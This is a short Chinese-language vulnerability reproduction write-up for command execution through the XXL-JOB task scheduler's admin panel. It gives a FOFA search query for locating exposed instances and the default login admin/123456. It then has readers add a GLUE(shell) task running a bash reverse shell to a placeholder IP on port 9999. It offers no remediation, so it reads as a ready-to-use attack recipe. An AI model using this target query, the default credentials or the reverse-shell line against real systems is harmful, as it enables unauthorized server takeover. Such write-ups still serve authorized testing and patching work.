# XXL-JOB 任务调度中心 后台任意命令执行漏洞 ## 漏洞描述 XXL-JOB 任务调度中心攻击者可以在后台可以通过写入shell命令任务调度获取服务器权限 ## 漏洞影响 ``` XXL-JOB ``` ## FOFA ``` app="XXL-JOB" || title="任务调度中心" ``` ## 漏洞复现 登录后台增加一个任务 - 默认口令 admin/123456 ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101914314.png) - 注意运行模式需要为 GLUE(shell) ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915543.png) 点击 GLUE IDE编辑脚本 ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915236.png) ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915343.png) 执行探测出网,和任务调用是否可执行 反弹一个shell ```plain #!/bin/bash bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1' ``` ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202101915912.png)